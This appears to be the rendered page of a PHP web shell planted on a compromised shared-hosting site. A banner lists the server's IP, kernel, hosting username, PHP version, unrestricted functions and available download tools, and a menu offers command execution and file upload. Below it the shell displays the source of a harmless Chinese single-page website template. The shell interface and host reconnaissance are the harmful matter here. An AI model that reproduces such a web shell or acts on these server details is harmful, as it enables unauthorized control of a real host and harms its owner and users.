Server IP : 162.214.80.37 / Your IP : 216.73.216.83 Web Server : Apache System : Linux sh013.webhostingservices.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : imyrqtmy ( 2189) PHP Version : 8.2.18 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/imyrqtmy/public_html/bestmatakichowki/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!DOCTYPE html> <html lang="en-US"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta name="robots" content="index,follow"> <title>单页面模板</title> <script src="https://cdn.tailwindcss.com"></script> </head> <body class="bg-gray-100 text-gray-800"> <!-- Banner --> <header class="bg-blue-600 text-white py-12 text-center"> <h1 class="text-4xl font-bold">欢迎来到我们的网站</h1> <p class="text-lg mt-2">简洁、实用、现代化的单页面模板</p> </header> <!-- 导航栏 --> <nav class="bg-white shadow sticky top-0 z-10"> <div class="container mx-auto px-4 py-4 flex justify-center space-x-8"> <a href="#section1" class="text-blue-600 hover:underline">关于我们</a> <a href="#section2" class="text-blue-600 hover:underline">服务</a> <a href="#section3" class="text-blue-600 hover:underline">联系我们</a> </div> </nav> <!-- Section 1 --> <section id="section1" class="container mx-auto px-4 py-12"> <h2 class="text-2xl font-semibold mb-6 text-center">关于我们</h2> <div class="flex flex-col md:flex-row items-center gap-8"> <img src="https://via.placeholder.com/400x250" alt="关于我们" class="rounded-lg shadow-md" /> <p class="text-lg leading-relaxed"> 我们是一支致力于提供高品质网页设计的团队,擅长简洁风格和用户体验优化。我们的目标是帮助客户打造功能与美感兼具的网站。 </p> </div> </section> <!-- Section 2 --> <section id="section2" class="bg-white py-12"> <div class="container mx-auto px-4"> <h2 class="text-2xl font-semibold mb-6 text-center">我们的服务</h2> <div class="grid md:grid-cols-3 gap-6"> <div class="bg-gray-50 p-6 rounded-lg shadow hover:shadow-lg transition"> <h3 class="text-xl font-semibold mb-2">网页设计</h3> <p>现代化、响应式、用户友好的网页布局。</p> </div> <div class="bg-gray-50 p-6 rounded-lg shadow hover:shadow-lg transition"> <h3 class="text-xl font-semibold mb-2">品牌策划</h3> <p>提升品牌价值,打造独特视觉识别系统。</p> </div> <div class="bg-gray-50 p-6 rounded-lg shadow hover:shadow-lg transition"> <h3 class="text-xl font-semibold mb-2">技术支持</h3> <p>网站维护、优化与技术咨询全方位服务。</p> </div> </div> </div> </section> <!-- Section 3 --> <section id="section3" class="container mx-auto px-4 py-12"> <h2 class="text-2xl font-semibold mb-6 text-center">联系我们</h2> <p class="text-center max-w-2xl mx-auto text-lg"> 如果你对我们的服务感兴趣,欢迎通过邮箱 info@example.com 与我们联系,或在下方留言,我们会尽快回复你。 </p> </section> <!-- Footer --> <footer class="bg-gray-800 text-white text-center py-6"> <p>© 2025 我的网站. 保留所有权利。</p> </footer> </body> </html>